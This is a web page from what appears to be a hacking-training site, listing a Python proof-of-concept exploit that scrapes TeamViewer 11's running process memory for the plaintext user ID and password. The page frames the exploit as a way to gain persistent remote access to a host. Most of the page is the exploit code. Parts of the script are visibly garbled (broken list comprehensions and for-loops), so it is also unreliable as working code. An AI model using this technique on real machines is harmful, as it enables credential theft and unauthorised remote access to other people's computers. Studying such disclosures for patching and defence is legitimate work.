ExtremeHacking
Today : | Time : | safemode : ON
> / Main Website / Cyber Surakha Abhiyan / Hackers Charity / Linkedin / facebook / twitter /
Name Author Perms Com Modified Label

TeamViewer 11.0.65452 (64 bit) - Local Credentials Disclosure Exploit Unknown rwxr-xr-x 0 9/09/2016

Filename TeamViewer 11.0.65452 (64 bit) - Local Credentials Disclosure Exploit
Permission rw-r--r--
Author Unknown
Date and Time 9/09/2016
Label
Action


Full titleTeamViewer 11.0.65452 (64 bit) - Local Credentials Disclosure Exploit
Date add08-09-2016
Categorylocal exploits
Platformwindows
Risk
Security Risk High


#####
# TeamViewer 11.0.65452 is vulnerable to local credentials disclosure, the supplied userid and password are stored in a plaintext format in memory process.
# There is no need in privilege account access. Credentials are stored in context of regular user.
# A potential attacker could reveal the supplied username and password automatically and gain persistent access to host via TeamViewer services.
#
# Proof-Of-Concept Code:
#####
  
from winappdbg import Debug, Process, HexDump
import sys
import re
  
filename = 'TeamViewer.exe'
  
def memory_search( pid ):
        found = []
        # Instance a Process object.
        process = Process( pid )
        # Search for the string in the process memory.
  
        # Looking for User ID:
        userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
        for address in process.search_regexp( userid_pattern ):
                 found += [address]
          
        print 'Possible UserIDs found:'
        found = [i[-1for in found]
        for in set(found):
           print i.replace('\x00','')
          
        found = []
        # Looking for Password:
        pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
        for address in process.search_regexp( pass_pattern ):
                 found += [process.read(address[0]-3,16)]
        if found:
            print '\nPassword:'
        if len(found) > 1:
            = list(set([x for in found if found.count(x) > 1]))
            for in s:
               pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0]
            print pwd
        else:
            print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]
          
        return found
  
debug = Debug()
try:
        # Lookup the currently running processes.
        debug.system.scan_processes()
        # For all processes that match the requested filename...
        for ( process, name ) in debug.system.find_processes_by_filename( filename ):
                pid = process.get_pid()
  
        memory_search(pid)
             
finally:
        debug.stop()


www.extremehacking.org
Cyber Suraksha Abhiyan, CEHv9, CHFI, ECSAv9, CAST, ENSA, CCNA, CCNA SECURITY, MCITP, RHCE, CHECKPOINT, ASA FIREWALL, VMWARE, CLOUD, ANDROID Hacking, IPHONE Hacking, NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India


 

Cyber Suraksha Abhiyan | Sadik Shaikh © 2015 Sadik Shaikh | CEH V9 | ETHICAL HACKING Course Training Institute in India-Pune
Extreme Hacking Template design by Sadik Shaikh | Cyber Suraksha Abhiyan